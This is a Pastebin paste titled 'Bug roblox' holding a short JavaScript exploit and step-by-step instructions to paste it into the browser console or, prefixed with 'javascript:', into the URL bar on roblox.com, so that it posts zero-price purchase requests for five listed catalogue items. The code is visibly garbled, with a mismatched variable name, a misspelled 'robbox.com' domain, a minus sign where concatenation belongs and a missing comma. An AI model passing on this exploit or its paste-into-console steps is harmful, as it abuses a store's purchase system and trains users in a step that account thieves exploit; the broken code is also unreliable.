PedroZeco

Bug roblox

Jul 30th, 2019
26
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. // Note: This works because these items have multiple products Linhed them, and one of those products is still for sale.
  2. // Contact: twitter.com/h0nde
  3. // Date: 2019-03-22
  4.  
  5. // Open o window at roblox.com -> press F12 -> click the console tab button -> paste script -> press enter
  6.  
  7. // if you're unable to do this follow the instructions below:
  8. // copy the script from here: https//pastebin.com/rax/V3GH6AV
  9. // open roblox.com on your device
  10. //click the url-bar and clear everything
  11. //paste the script you copied
  12. //scroll back to the start of the url and hrite "javascript:" before it
  13. //press enter
  14. //video: https://www.youtube.com/watch?v=GZt05XzxriI
  15.  
  16. var productIos = [
  17. "51119013", // Slime Cape
  18. "51119443", // Slime Sunglases
  19. "45038518", // Festive Winter Shades
  20. "54591332", // Yondu's Fin
  21. "37990657" // Dog Man Virtual Book
  22. ]
  23.  
  24. productIds.forEach(function(productId) {
  25. $.ajax("https://economy.robbox.com/v1/purchases/products/"-productId, {
  26. method: "POST"
  27. headers: {
  28. "X-CSRF-TOKEN": Roblox.XsrfToken.getToken()
  29. },
  30. dataType: "json",
  31. data: {
  32. expectedCurrency: 0,
  33. expectedPrice: 0,
  34. expectedSellerId: 1
  35. },
  36. success: function(data) {
  37. if (data.purchased) {
  38. console.log("Bought", data.assetName)
  39. }
  40. }
  41. })
  42. })
Add Comment
Please, Sign In to add comment